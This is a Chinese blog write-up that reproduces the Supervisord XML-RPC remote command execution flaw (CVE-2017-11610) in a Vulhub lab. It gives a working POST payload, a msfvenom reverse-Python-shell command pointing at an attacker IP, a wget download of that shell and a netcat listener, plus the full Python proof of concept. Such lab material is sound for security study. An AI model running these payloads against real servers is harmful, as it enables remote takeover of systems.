Vulhub Supervisord 远程命令执行漏洞复现

最新推荐文章于 2024-04-23 10:22:31 发布
最新推荐文章于 2024-04-23 10:22:31 发布
阅读量262 收藏 1
点赞数
文章标签: 服务器 运维 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53696027/article/details/131093966
版权

漏洞介绍

漏洞简介

Supervisord是一款Python开发的一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。

漏洞编号

CVE-2017-11610

影响版本

3.0.1之前的版本

3.1.4之前的3.1.x版本

3.2.4之前的3.2.x版本

3.3.3之前的3.3.x版本

环境搭建

cd /vulhub/supervisor/CVE-2017-11610

docker-compose up -d

访问 靶场IP:9001 验证靶场开启

漏洞复现

方法一

Payload如下:

POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>要执行的命令</string>
</param>
</params>
</methodCall>

使用DNSlog.cn验证命令执行是否存在

通过POC执行ping命令ping DNSlog.cn

刷新后查看是否ping通来判断漏洞存在

在攻击机通过msf生成一个shell的py脚本

msfvenom -p cmd/unix/reverse_python LHOST=攻击者IP LPORT=监听端口 -f raw > shell.py

 在通过python模拟一个HTTP服务器

python -m SimpleHTTPServer

 

 wget 攻击IP:端口/shell脚本 -O 上传地址

查看返回结果

通过BP抓包执行shell脚本

通过nc监听端口实现getshell

方法二

通过Vulhub官网给出的POC测试:

#!/usr/bin/env python3
import xmlrpc.client
import sys

target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
    old = getattr(proxy, 'supervisor.readLog')(0,0)

    logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
    getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
    result = getattr(proxy, 'supervisor.readLog')(0,0)

    print(result[len(old):])

执行python脚本

weixin_53696027
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulhub-spring漏洞复现
qq_51922767的博客
09-14 2571
vulhub-spring漏洞复现
vulhub漏洞复现77_zabbix
weixin_44193247的博客
02-14 1536
vulhub漏洞复现练习篇
[ vulhub漏洞复现篇 ] vulhub 漏洞集合(含漏洞复现文章连接)
小司机的奥拓
04-23 1643
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部复现,欢迎持续订阅我也会不定期再中间更新复现文章链接目的:以复现 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行复现,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者。
Vulhub靶场之Tomcat漏洞复现
weixin_66717977的博客
06-30 432
tomcat漏洞复现
Webmin远程命令执行漏洞复现
yuan_boss的博客
10-12 440
详细的来说,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码,该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。payload中的IP改为目标网站的IP,注意user=rootxx这部分,如果写的是user=root,肯定不能成功注入,必须是目标网站的服务器中不存在的用户,否则就会命令执行失败。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令
Vulhub漏洞复现
weixin_45995579的博客
09-30 1703
蔚莱. 1.环境搭建 下载vulhub压缩包,解压到Ubuntu16.04系统下。 进入到Tomcat put 漏洞对应的CVE漏洞编号/vulhub-master/httpd/ssi-rce路径下,执行如下两条命令: docker-compose build docker-compose up -d 网站的配置文件在当前路径下的docker-compose.yml文件内: 【注】:CVE漏洞环境默认开启的端口是8080,当要同时开启多个CVE漏洞环境时需要
supervisord命令 配置后台服务/常驻进程的进程工具
01-09
语法格式: supervisord [参数] 常用参数: status 查看程序状态 start 启动程序 stop 关闭程序 update 重启配置文件修改过的程序 参考实例 查看进程运行状态: [root@linuxcool ~]# supervisorctl ...
supervisord
07-04
supervisord配置,用于守护服务进程,以及数据库进程,防止进程奔溃
supervisord.conf配置文档
10-25
可供初学者在学习过程中参考。少走几次度娘就能配置好supervisor
supervisord管理进程资源
02-17
在本篇文章中,我们将深入探讨`supervisord`的使用及其与`RPC`(远程过程调用)的结合,同时也会提及`JAVA`、`MAVEN`和`Spring`在这一场景中的角色。 首先,让我们了解`supervisord`的基本概念。`supervisord`是一...
supervisord安装操作手册和软件
09-12
安装包(含):supervisor-3.4.0.tar.gz, 依赖包(含):meld3-2.0.0-py2.py3-none-any.whl、pip-19.3.1.tar.gz、setuptools-40.7.3-py2.py3-none-any.whl 依赖环境(亲测):RedHat7.* ,python2.7
Supervisord 远程命令执行漏洞(CVE-2017-11610)
weixin_34397291的博客
08-11 166
Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XMLRPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程***者可发送一段精心构造的请求,导致可在服务器执行任意代码。影响...
漏洞复现】Metabase 远程命令执行漏洞(CVE-2023-38646)
做自己喜欢的事,并将其发挥到极致!
08-03 4482
Metabase是美国Metabase公司的一个开源数据分析平台。Metabase是一个开源的数据分析和可视化工具,它可以帮助用户轻松地连接到各种数据源,包括数据库、云服务和API,然后使用直观的界面进行数据查询、分析和可视化。Metabase 0.46.6.1之前版本和Metabase Enterprise 1.46.6.1之前版本存在安全漏洞,该漏洞源于允许攻击者以服务器的权限级别在服务器执行任意命令
spring boot远程代码执行漏洞复现
qq_63980959的博客
09-20 2363
目前我们所使用的https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-mysql-jdbc-rce靶场环境存在问题,需要进行相关配置。https://github.com/LandGrey/SpringBootVulExploit#0x07h2-database-console-jndi-rce上的该漏洞复现方式已经不能用了。如果你遇到了程序异常退出问题,可以尝试修改我们的java注入代码。
【IP-guard WebServer 远程命令执行漏洞复现(0day)】
一纸荒芜的博客
11-10 3192
IP-guard Webserver远程命令执行漏洞(RCE)漏洞复现
Supervisord RCE(CVE-2017-11610)
夜幕下的灯火阑珊的博客
07-20 75
打开是这个页面 直接发送如下数据包 POST /RPC2 HTTP/1.1 Host: 192.168.134.132:9001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,app...
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 2954
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口为9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
漏洞公告】CVE-2017-11610:Supervisord 远程命令执行漏洞
CS13522431352的博客
08-09 671
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞(CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。
启动supervisord
最新发布
06-06
2. 执行以下命令来启动supervisord: ```shell supervisord -c /etc/supervisor/supervisord.conf ``` 其中,`/etc/supervisor/supervisord.conf`是supervisor的配置文件路径,根据实际情况进行修改。 3. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值